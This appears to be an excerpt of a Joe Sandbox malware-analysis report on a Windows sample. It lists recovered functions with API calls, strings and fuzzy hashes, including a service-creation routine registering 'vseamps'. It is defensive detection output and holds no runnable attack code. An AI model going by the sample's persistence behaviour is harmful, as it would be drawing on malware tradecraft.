Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
String ID:
API String ID: 4284112124-0
Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40

Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000000014000145E
OpenSCManagerW.ADVAPI32 ref: 000000014000146C
GetLastError.KERNEL32 ref: 000000014000147A
CreateServiceW.ADVAPI32 ref: 00000001400014D4
CloseServiceHandle.ADVAPI32 ref: 00000001400014E2
CloseServiceHandle.ADVAPI32 ref: 00000001400014F5

Strings

vseamps, xrefs: 00000001400014AD, 00000001400014B4

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
String ID: vseamps
API String ID: 3693165506-3944098904
Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00

Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF

Strings

Runtime Error!Program: , xrefs: 000000014000938D
..., xrefs: 0000000140009431
Microsoft Visual C++ Runtime Library, xrefs: 00000001400094B4
<program name unknown>, xrefs: 00000001400093D9

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304

Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000BBDC
GetLastError.KERNEL32 ref: 000000014000BBEC
LCMapStringW.KERNEL32 ref: 000000014000BC5F
WideCharToMultiByte.KERNEL32 ref: 000000014000BCC8
WideCharToMultiByte.KERNEL32 ref: 000000014000BD80
LCMapStringA.KERNEL32 ref: 000000014000BDA3

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

LCMapStringA.KERNEL32 ref: 000000014000BE48
MultiByteToWideChar.KERNEL32 ref: 000000014000BEC8

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: String$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 2057259594-0
Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700

Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 0000000140005A8B
GetProcessHeap.KERNEL32 ref: 0000000140005A92
HeapAlloc.KERNEL32 ref: 0000000140005AA3
GetVersionExA.KERNEL32 ref: 0000000140005AE6
GetProcessHeap.KERNEL32 ref: 0000000140005AF0
HeapFree.KERNEL32 ref: 0000000140005AFE
GetProcessHeap.KERNEL32 ref: 0000000140005B22
HeapFree.KERNEL32 ref: 0000000140005B30

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$Process$Free$AllocInfoStartupVersion
String ID:
API String ID: 3103264659-0
Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741

Function 00007FFDAC122630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFDAC12264C
RtlCaptureContext.KERNEL32 ref: 00007FFDAC122679
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDAC122693
RtlVirtualUnwind.KERNEL32 ref: 00007FFDAC1226D4
IsDebuggerPresent.KERNEL32 ref: 00007FFDAC122728
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDAC122745
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDAC122750

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction ID: eb6035e9baba868f2274e7ae06f5b28b39ad5a70cad2cee34e6cbd99d1e5f599
Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction Fuzzy Hash: 5631377770AA818AEB619F60E8907ED3361FB847A8F44403ADA4E47B96DF3CC548C714

Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140007D66
IsDebuggerPresent.KERNEL32 ref: 0000000140007DAA
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140007DB4
UnhandledExceptionFilter.KERNEL32 ref: 0000000140007DBF
GetCurrentProcess.KERNEL32 ref: 0000000140007DD5
TerminateProcess.KERNEL32 ref: 0000000140007DE3

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00

Function 00007FFDAC1276E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFDAC127759
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDAC127771
RtlVirtualUnwind.KERNEL32 ref: 00007FFDAC1277AC
IsDebuggerPresent.KERNEL32 ref: 00007FFDAC1277E5
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDAC1277EF
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDAC1277FA

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction ID: ebead5a21f2b04e8b5da7a2ec720c21d101876c195b29a75a255520dea11fe43
Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction Fuzzy Hash: 70315937719F8186DB619B24E8503AE33A0FB887A8F500136EA9D43B96DF3CC159CB04

Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000014000A3AF
GetCurrentProcessId.KERNEL32 ref: 000000014000A3BA
GetCurrentThreadId.KERNEL32 ref: 000000014000A3C6
GetTickCount.KERNEL32 ref: 000000014000A3D2
QueryPerformanceCounter.KERNEL32 ref: 000000014000A3E3

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700

Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704

Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00000001400106EF
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140010735
UnhandledExceptionFilter.KERNEL32 ref: 0000000140010740

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContext
String ID:
API String ID: 2202868296-0
Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01

Function 00007FFDAC130248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FFDAC130497
RaiseException.KERNEL32 ref: 00007FFDAC1304A8

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction ID: 9e7962ff1f29ee89867b2ff368f352f8d3f78e1f9eb5e2e2aa61b75657a215db
Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction Fuzzy Hash: AAB14473701B898BEB56CF29C89636C3BE0F784B98F148921DA9D877A5CB39D451C704

Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00000001400105C2
GetLastError.KERNEL32 ref: 00000001400105ED

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10

Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300

Function 00007FFDAC12A1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction ID: 47db921b2e824763b201af2fe133226bb1d49537ca1571738f34dce87a38b7df
Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction Fuzzy Hash: 8D51F427B0978189FB219B72A8506AA7BA1FB40BE4F144134EE5C37B8ADE3CD401C709

Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: EntryFunctionLookup
String ID:
API String ID: 3852435196-0
Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704

Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 000000014000E388

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40

Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000014000F398

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00

Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00

Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
